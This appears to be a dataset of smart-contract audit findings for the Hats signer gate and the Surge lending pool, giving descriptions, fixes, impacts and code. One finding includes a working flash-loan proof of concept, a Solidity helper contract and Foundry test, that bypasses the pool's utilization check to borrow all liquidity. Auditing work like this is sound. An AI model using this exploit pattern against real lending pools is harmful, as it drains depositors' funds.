`_removeSigner` can be called whenever a signer is no longer valid to remove an invalid signer. However, under certain situations, `removeSigner` incorrectly reduces `signerCount` and sets the `threshold` incorrectly.\\n`_removeSigner` uses the code snippet below to decide if `signerCount` should be reduced:\\n```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n\\nThe first clause is supposed to be activated when `validSignerCount` and `currentSignerCount` are still in sync and we want to remove an invalid signer. The second clause is for when we need to identify a previously active signer which is now inactive and want to remove it. However, it does not take into account that a previously inactive signer may have become active again. In the scenario described below, `signerCount` is updated incorrectly:\\n(1) Imagine there are 5 signers, where 0, 1 and 2 are active while 3 and 4 are inactive; the current `signerCount = 3` (2) If signer 3 regains its hat, it becomes active again (3) If we then want to delete signer 4 from the owners' list, the `_removeSigner` function will go through the signers and find 4 valid signers; since there were previously 3 signers, `validSignerCount == currentSignerCount` is false. (4) In this case, although `validSignerCount` increased, `_removeSigner` reduces the count by one.
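The faulty branch can be checked numerically with a quick Python sketch (a hypothetical model of just this branch, contrasting the `==` check with the recommended `>=`):

```python
# Models the signer-count branch in _removeSigner described above.
def new_signer_count(valid_signer_count, current_signer_count, use_fix=False):
    # buggy version treats any mismatch as "one signer went inactive"
    in_sync = (valid_signer_count >= current_signer_count) if use_fix \
        else (valid_signer_count == current_signer_count)
    return current_signer_count if in_sync else current_signer_count - 1

# scenario: signerCount = 3, signer 3 regained its hat, so 4 signers are valid,
# and we remove the still-invalid signer 4
valid, current = 4, 3
print(new_signer_count(valid, current))                # 2: count wrongly decremented
print(new_signer_count(valid, current, use_fix=True))  # 3: count preserved
```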
Check if the number of `validSignerCount` decreased instead of checking equality:\\n```\\n@line 387 HatsSignerGateBase\\n- if (validSignerCount == currentSignerCount) {\\n+ if (validSignerCount >= currentSignerCount) {\\n```\\n
This can make the `signerCount` and safe `threshold` to update incorrectly which can cause further problems, such as incorrect number of signatures needed.
```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n
The Hats contract needs to override the ERC1155.balanceOfBatch function
medium
The Hats contract does not override the ERC1155.balanceOfBatch function\\nThe Hats contract overrides the ERC1155.balanceOf function to return a balance of 0 when the hat is inactive or the wearer is ineligible.\\n```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n\\nBut the Hats contract does not override the ERC1155.balanceOfBatch function, which causes balanceOfBatch to return the actual balance no matter what the circumstances.\\n```\\n function balanceOfBatch(address[] calldata owners, uint256[] calldata ids)\\n public\\n view\\n virtual\\n returns (uint256[] memory balances)\\n {\\n require(owners.length == ids.length, "LENGTH_MISMATCH");\\n\\n balances = new uint256[](owners.length);\\n\\n // Unchecked because the only math done is incrementing\\n // the array index counter which cannot possibly overflow.\\n unchecked {\\n for (uint256 i = 0; i < owners.length; ++i) {\\n balances[i] = _balanceOf[owners[i]][ids[i]];\\n }\\n }\\n }\\n```\\n
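The divergence between the two view functions can be modeled in a few lines of Python (a toy model; the dict stands in for raw ERC1155 storage):

```python
_balance_of = {("alice", 1): 5}  # raw ERC1155 storage

def balance_of(wearer, hat_id, active, eligible):
    # overridden version: reports 0 when the hat is inactive or wearer ineligible
    return _balance_of.get((wearer, hat_id), 0) if active and eligible else 0

def balance_of_batch(owners, ids):
    # un-overridden ERC1155 version: raw storage reads only
    return [_balance_of.get((o, i), 0) for o, i in zip(owners, ids)]

# hat 1 is toggled off: balanceOf says 0, balanceOfBatch still says 5
print(balance_of("alice", 1, active=False, eligible=True))  # 0
print(balance_of_batch(["alice"], [1]))  # [5]
```

An integrator that batches reads would conclude the hat is still worn even though `balanceOf` reports otherwise.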
Consider overriding the ERC1155.balanceOfBatch function in Hats contract to return 0 when the hat is inactive or the wearer is ineligible.
This will make balanceOfBatch return a different result than balanceOf, which may cause errors when integrating with other projects
```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n
Unbound recursive function call can use unlimited gas and break hats operation
medium
Some of the functions in the Hats and HatsIdUtilities contracts have recursive logic without limiting the number of iterations. This can cause unlimited gas usage if hat trees have a huge depth, and it won't be possible to call the contracts' functions. The functions `getImageURIForHat()`, `isAdminOfHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` would revert, and because most of the logic calls those functions, the contract would be in a broken state for those hats.\\nThis is the `isAdminOfHat()` function:\\n```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n\\nAs you can see, this function calls itself recursively to check whether the user is a wearer of one of the upper linked hats. If the chain (depth) of hats in the tree becomes very long, this function will revert because of gas usage, and the cost will be high enough that it won't be possible to call it in a transaction. The functions `getImageURIForHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` have similar issues, and their gas usage depends on the tree depth. The issue can happen suddenly for hats if a top-level topHat decides to add a link, for example:\\nHat1 is linked to a chain of hats that has 1000 "root hats", and its topHat (tippy hat) is TIPHat1.\\nHat2 is linked to a chain of hats that has 1000 "root hats", and its topHat (tippy hat) is TIPHat2.\\nThe admin of TIPHat1 decides to link it to Hat2; after performing that, the total depth of the tree increases to 2000 and transactions cost twice as much gas.
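The unbounded traversal can be simulated in Python, with recursion depth standing in for gas (a deliberately simplified model of the linked-tree walk, not the actual contract logic):

```python
import sys
sys.setrecursionlimit(5000)  # stand-in for a generous gas limit

def is_admin_of_hat(linked_tree_admins, hat, user_hats):
    # simplified model of isAdminOfHat: recurse up the linked trees
    if hat in user_hats:
        return True
    parent = linked_tree_admins.get(hat)
    return parent is not None and is_admin_of_hat(linked_tree_admins, parent, user_hats)

# two chains of 1000 linked tophats each
links = {i: i + 1 for i in range(999)}                  # tree A: 0 -> ... -> 999
links.update({1000 + i: 1001 + i for i in range(999)})  # tree B: 1000 -> ... -> 1999
links[999] = 1000  # TIPHat1's admin links tree A under tree B: depth doubles

# resolving an admin at the bottom of tree A now takes ~2000 recursive steps
print(is_admin_of_hat(links, 0, {1999}))  # True, at twice the previous cost
```

With a bounded depth as recommended, the `links[999] = 1000` step would be rejected before the tree could grow this deep.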
The code should enforce a maximum hat tree depth and disallow actions when this level would be breached (keep track of the depth of each tophat's tree, update it when linking actions happen, and reject actions that would increase the depth above the threshold).
It won't be possible to perform actions for those hats, and funds can be lost as a result.
```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n
Owners can be swapped even though they still wear their signer hats
medium
`HatsSignerGateBase` does not check for a change of owners post-flight. This allows a group of actors to collude and replace opposing signers with cooperating signers, even though the replaced signers still wear their signer hats.\\nThe `HatsSignerGateBase` performs various checks to prevent a multisig transaction to tamper with certain variables. Something that is currently not checked for in `checkAfterExecution` is a change of owners. A colluding group of malicious signers could abuse this to perform swaps of safe owners by using a delegate call to a corresponding malicious contract. This would bypass the requirement of only being able to replace an owner if he does not wear his signer hat anymore as used in _swapSigner:\\n```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n "swapOwner(address,address,address)",\\n // rest of code\\n```\\n
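The recommended pre-/post-flight comparison can be sketched in Python (hashing the owner list, analogous to the existing module check; the names here are purely illustrative):

```python
import hashlib

def owners_hash(owners):
    return hashlib.sha256(",".join(owners).encode()).hexdigest()

# pre-flight snapshot, as would be taken in checkTransaction
owners = ["signerA", "signerB", "signerC"]
pre = owners_hash(owners)

# a colluding delegatecall swaps signerC (still wearing its hat) for an accomplice
owners[2] = "accomplice"

# post-flight comparison in checkAfterExecution, analogous to the module check
post = owners_hash(owners)
print(post != pre)  # True -> the recommended check would revert this transaction
```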
Perform a pre- and post-flight comparison on the safe owners, analogous to what is currently done with the modules.
Colluding signers can bypass the owner-swap restrictions and replace owners who still wear their signer hats, performing actions that should be disallowed.
```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n "swapOwner(address,address,address)",\\n // rest of code\\n```\\n
Safe can be bricked because threshold is updated with validSignerCount instead of newThreshold
high
The safe's threshold is supposed to be set with the lower value of the `validSignerCount` and the `targetThreshold` (intended to serve as the maximum). However, the wrong value is used in the call to the safe's function, which in some circumstances can lead to the safe being permanently bricked.\\nIn `reconcileSignerCount()`, the valid signer count is calculated. We then create a value called `newThreshold`, and set it to the minimum of the valid signer count and the target threshold. This is intended to be the value that we update the safe's threshold with.\\n```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n\\nHowever, there is a typo in the contract call, which accidentally uses `validSignerCount` instead of `newThreshold`.\\nThe result is that, if there are more valid signers than the `targetThreshold` that was set, the threshold will be set higher than intended, and the threshold check in `checkAfterExecution()` will fail for being above the max, causing all safe transactions to revert.\\nThis is a major problem because it cannot necessarily be fixed. In the event that it is a gate with a single hat signer, and the eligibility module for the hat doesn't have a way to turn off eligibility, there will be no way to reduce the number of signers. If this number is greater than `maxSigners`, there is no way to increase `targetThreshold` sufficiently to stop the reverting.\\nThe result is that the safe is permanently bricked, and will not be able to perform any transactions.
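The arithmetic of the bug is easy to verify with a Python sketch of the branch in `reconcileSignerCount()` (illustrative numbers; not the actual contract code):

```python
def new_threshold(valid_signer_count, target, current_threshold):
    # mirrors the branch quoted above
    nt = 0
    if valid_signer_count <= target and valid_signer_count != current_threshold:
        nt = valid_signer_count
    elif valid_signer_count > target and current_threshold < target:
        nt = target
    return nt

valid, target, current = 7, 5, 4
nt = new_threshold(valid, target, current)
print(nt)     # 5: the intended new threshold, capped at target
print(valid)  # 7: what the buggy call actually sets -> exceeds target,
              # so checkAfterExecution() reverts every transaction
```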
Issue Safe can be bricked because threshold is updated with validSignerCount instead of newThreshold\\nChange the value in the function call from `validSignerCount` to `newThreshold`.\\n```\\nif (newThreshold > 0) {\\n// Remove the line below\\n bytes memory data = abi.encodeWithSignature("changeThreshold(uint256)", validSignerCount);\\n// Add the line below\\n bytes memory data = abi.encodeWithSignature("changeThreshold(uint256)", newThreshold);\\n\\n bool success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecChangeThreshold();\\n }\\n}\\n```\\n
All transactions will revert until `validSignerCount` can be reduced back below `targetThreshold`, which may not be possible if the hat's eligibility module has no way to revoke signers — in that case the safe is permanently bricked.
```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n
Changing hat toggle address can lead to unexpected changes in status
medium
Changing the toggle address should not change the current status unless intended to. However, in the event that a contract's toggle status hasn't been synced to local state, this change can accidentally toggle the hat back on when it isn't intended.\\nWhen an admin for a hat calls `changeHatToggle()`, the `toggle` address is updated to a new address they entered:\\n```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n\\nToggle addresses can be either EOAs (who must call `setHatStatus()` to change the local config) or contracts (who must implement the `getHatStatus()` function and return the value).\\nThe challenge comes if a hat has a toggle address that is a contract. The contract changes its toggle value to `false` but is never checked (which would push the update to the local state). The admin thus expects that the hat is turned off.\\nThen, the toggle is changed to an EOA. One would expect that, until a change is made, the hat would remain in the same state, but in this case, the hat defaults back to its local storage state, which has not yet been updated and is therefore set to `true`.\\nEven in the event that the admin knows this and tries to immediately toggle the status back to `false`, it is possible for a malicious user to sandwich their transaction between the change to the EOA and the transaction to toggle the hat off, making use of a hat that should be off. This could have dramatic consequences when hats are used for purposes such as multisig signing.
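A small Python state model illustrates the unexpected flip (hypothetical; the two dicts stand in for the local config and the toggle contract's live view):

```python
# local storage: last synced status; never updated because getHatStatus()
# was never checked after the toggle contract flipped to False
local_status = {42: True}
contract_toggle_status = {42: False}  # what the toggle contract would report

def hat_status(hat_id, toggle_is_contract):
    if toggle_is_contract:
        return contract_toggle_status[hat_id]  # queried live via getHatStatus()
    return local_status[hat_id]                # EOA toggles fall back to local state

print(hat_status(42, toggle_is_contract=True))   # False: hat appears off
# admin calls changeHatToggle() to an EOA without syncing first...
print(hat_status(42, toggle_is_contract=False))  # True: hat silently flips back on
```

Calling `checkHatToggle()` before the switch would copy `False` into local storage, so the status would survive the handover.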
The `changeHatToggle()` function needs to call `checkHatToggle()` before changing over to the new toggle address, to ensure that the latest status is synced up.
Hats may unexpectedly be toggled from `off` to `on` during toggle address transfer, reactivating hats that are intended to be turned `off`.
```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n
Precision differences when calculating userCollateralRatioMantissa causes major issues for some token pairs
high
When calculating userCollateralRatioMantissa in borrow and liquidate, the raw debt value (in loan token precision) is divided by the raw collateral balance (in collateral precision). This skew is fine for a majority of tokens but will cause issues with specific token pairs, including being unable to liquidate a subset of positions no matter what.\\nWhen calculating userCollateralRatioMantissa, both the debt and collateral values are left in their native precision. As a result, certain token pairs will be completely broken, while others will only be partially broken and can enter a state in which it's impossible to liquidate positions.\\nImagine a token pair like USDC and SHIB. USDC has a token precision of 6 and SHIB has 18. If the user has a collateral balance of 1,000,001 SHIB (1,000,001e18) and a loan borrow of 1 USDC (1e6) then their userCollateralRatioMantissa will actually calculate as zero due to integer division:\\n```\\n1e6 * 1e18 / 1,000,001e18 = 0\\n```\\n\\nThere are two issues with this. The first is that a majority of these token pairs simply won't work. The other is that because userCollateralRatioMantissa returns 0, there are states in which some debt is impossible to liquidate, breaking a key invariant of the protocol.\\nAny token with very high or very low precision will suffer from this.
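The integer division can be verified directly in Python. The numbers are illustrative: for a 1 USDC debt, any collateral balance above 1e6 SHIB (e.g. 1,000,001 SHIB) floors the raw-precision ratio to zero:

```python
LOAN_DECIMALS = 6        # USDC
COLLATERAL_DECIMALS = 18 # SHIB

debt = 1 * 10**LOAN_DECIMALS                      # 1 USDC
collateral = 1_000_001 * 10**COLLATERAL_DECIMALS  # 1,000,001 SHIB

# raw-precision ratio, as computed in borrow()/liquidate()
ratio = debt * 10**18 // collateral
print(ratio)  # 0 -> the position looks infinitely collateralized

# normalizing the debt to 18 decimals keeps the ratio meaningful
debt_18 = debt * 10**(18 - LOAN_DECIMALS)
ratio_normalized = debt_18 * 10**18 // collateral
print(ratio_normalized)  # 999999000000, i.e. ~1e-6 of 1e18
```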
userCollateralRatioMantissa should be calculated using debt and collateral values normalized to 18 decimal points
Some token pairs will always be broken, and others can become broken over time
```\\n1e6 * 1e18 / 1,000,001e18 = 0\\n```\\n
Fee share calculation is incorrect
medium
Fees are given to the feeRecipient by minting them shares. The current share calculation is incorrect and always mints too many shares to the fee recipient, giving them more fees than they should get.\\nThe current equation is incorrect and will give too many shares, which is demonstrated in the example below.\\nExample:\\n```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n\\nCalculate the fee with the current equation:\\n```\\n_accruedFeeShares = fee * _totalSupply / _supplied = 2 * 100 / 100 = 2\\n```\\n\\nThis yields 2 shares. Next calculate the value of the new shares:\\n```\\n2 * 110 / 102 = 2.156\\n```\\n\\nThe value of these shares yields a larger than expected fee. Using a revised equation gives the correct amount of fees:\\n```\\n_accruedFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee) = 2 * 100 / (100 + 10 - 2) = 1.852\\n\\n1.852 * 110 / 101.852 = 2\\n```\\n\\nThis new equation yields the proper fee of 2.
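The two formulas can be checked exactly with Python's `fractions` module, using the numbers from the example above:

```python
from fractions import Fraction

supplied, total_supply = 100, 100
interest, fee = 10, 2

# current (buggy) formula: shares priced against pre-interest supply
buggy_shares = Fraction(fee * total_supply, supplied)  # 2
buggy_value = buggy_shares * Fraction(supplied + interest, total_supply + buggy_shares)
print(float(buggy_value))  # ~2.157: recipient gets more than the 2-token fee

# revised formula from the recommendation
fixed_shares = Fraction(total_supply * fee, supplied + interest - fee)  # 50/27 ~ 1.852
fixed_value = fixed_shares * Fraction(supplied + interest, total_supply + fixed_shares)
print(float(fixed_value))  # 2.0: exactly the intended fee
```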
Issue Fee share calculation is incorrect\\nUse the modified equation shown above:\\n```\\n uint fee = _interest * _feeMantissa / 1e18;\\n // 13. Calculate the accrued fee shares\\n- _accruedFeeShares = fee * _totalSupply / _supplied; // if supplied is 0, we will have returned at step 7\\n+ _accruedFeeShares = _totalSupply * fee / (_supplied + _interest - fee); // if supplied is 0, we will have returned at step 7\\n // 14. Update the total supply\\n _currentTotalSupply += _accruedFeeShares;\\n```\\n
Fee recipient is given more fees than intended, which results in less interest for LPs
```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n
Users can borrow all loan tokens
medium
Utilization rate check can be bypassed depositing additional loan tokens and withdrawing them in the same transaction.\\nIn the `borrow` function it is checked that the new utilization ratio will not be higher than the surge threshold. This threshold prevents borrowers from draining all available liquidity from the pool and also trigger the surge state, which lowers the collateral ratio.\\nA user can bypass this and borrow all available loan tokens following these steps:\\nDepositing the required amount of loan tokens in order to increase the balance of the pool.\\nBorrow the remaining loan tokens from the pool.\\nWithdraw the loan tokens deposited in the first step.\\nThis can be done in one transaction and the result will be a utilization rate of 100%. Even if the liquidity of the pool is high, the required loan tokens to perform the strategy can be borrowed using a flash loan.\\nHelper contract:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from "./FlashLoan.sol";\\nimport { Pool } from "./../../src/Pool.sol";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = 
abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n\\nExecution:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport "forge-std/Test.sol";\\nimport "../src/Pool.sol";\\nimport "../src/Factory.sol";\\nimport "./mocks/Borrower.sol";\\nimport "./mocks/ERC20.sol";\\n\\ncontract PoC is Test {\\n address alice = vm.addr(0x1);\\n address bob = vm.addr(0x2);\\n Factory factory;\\n Pool pool;\\n Borrower borrower;\\n Flashloan flashLoan;\\n MockERC20 collateralToken;\\n MockERC20 loanToken;\\n uint maxCollateralRatioMantissa;\\n uint surgeMantissa;\\n uint collateralRatioFallDuration;\\n uint collateralRatioRecoveryDuration;\\n uint minRateMantissa;\\n uint surgeRateMantissa;\\n uint maxRateMantissa;\\n\\n function setUp() public {\\n factory = new Factory(address(this), "G");\\n flashLoan = new Flashloan();\\n collateralToken = new MockERC20(1 ether, 18);\\n collateralToken.transfer(bob, 1 ether);\\n loanToken = new MockERC20(100 ether, 18);\\n loanToken.transfer(alice, 1 ether);\\n loanToken.transfer(address(flashLoan), 99 ether);\\n maxCollateralRatioMantissa = 1e18;\\n surgeMantissa = 0.8e18; // 80%\\n pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), maxCollateralRatioMantissa, surgeMantissa, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n }\\n\\n function testFailBorrowAll() external {\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n 
collateralToken.approve(address(pool), 1 ether);\\n pool.addCollateral(bob, 1 ether);\\n pool.borrow(1 ether);\\n vm.stopPrank();\\n }\\n\\n function testBypassUtilizationRate() external {\\n uint balanceBefore = loanToken.balanceOf(bob);\\n\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n borrower = new Borrower(flashLoan, pool);\\n pool.addCollateral(address(borrower), 1 ether);\\n borrower.borrowAll();\\n vm.stopPrank();\\n\\n assertEq(loanToken.balanceOf(bob) - balanceBefore, 1 ether);\\n }\\n}\\n```\\n
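The deposit-borrow-withdraw sequence can also be modeled with a toy pool in Python (a simplified stand-in for the Surge pool; only the checks relevant to the bypass are modeled, and `assert` plays the role of a revert):

```python
class Pool:
    # toy model: only the utilization check on borrow, as described above
    def __init__(self, surge_threshold=0.8):
        self.supplied = 0.0
        self.borrowed = 0.0
        self.surge_threshold = surge_threshold

    def deposit(self, amount):
        self.supplied += amount

    def withdraw(self, amount):
        # can only withdraw tokens that are not currently lent out
        assert self.supplied - amount >= self.borrowed, "insufficient liquidity"
        self.supplied -= amount

    def borrow(self, amount):
        new_util = (self.borrowed + amount) / self.supplied
        assert new_util <= self.surge_threshold, "utilization above surge threshold"
        self.borrowed += amount

pool = Pool()
pool.deposit(1.0)  # Alice supplies 1 loan token

# Bob, inside one transaction (flash-loan funded):
pool.deposit(1.0)   # 1. inflate the pool balance
pool.borrow(1.0)    # 2. util = 1/2 = 50% <= 80%, passes the check
pool.withdraw(1.0)  # 3. pull the deposit back out

print(pool.borrowed / pool.supplied)  # 1.0 -> 100% utilization
```

A direct `borrow(1.0)` without the sandwiching deposit/withdraw would fail the surge check, which is exactly what the bypass exploits.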
A possible solution would be adding a locking period for deposits of loan tokens.\\nAnother possibility is to enforce that the utilization rate was also under the surge threshold in the previous snapshot.
The vulnerability allows draining all the liquidity from the pool, which entails two problems:\\nThe collateral ratio starts decreasing and only stops if the utilization ratio goes back to the surge threshold.\\nThe suppliers will not be able to withdraw their tokens.\\nThe vulnerability can be executed by the same or other actors every time a loan is repaid or a new deposit is made, by tracking the mempool and borrowing any new amount of loan tokens available in the pool, until the collateral ratio reaches zero.\\nA clear case with economic incentives to perform this attack would be when the collateral token's price drops sharply: an attacker can borrow all the available loan tokens from the pool, leaving all suppliers without the chance of withdrawing their share.
```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from "./FlashLoan.sol";\\nimport { Pool } from "./../../src/Pool.sol";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n
fund loss because calculated Interest would be 0 in getCurrentState() due to division error
medium
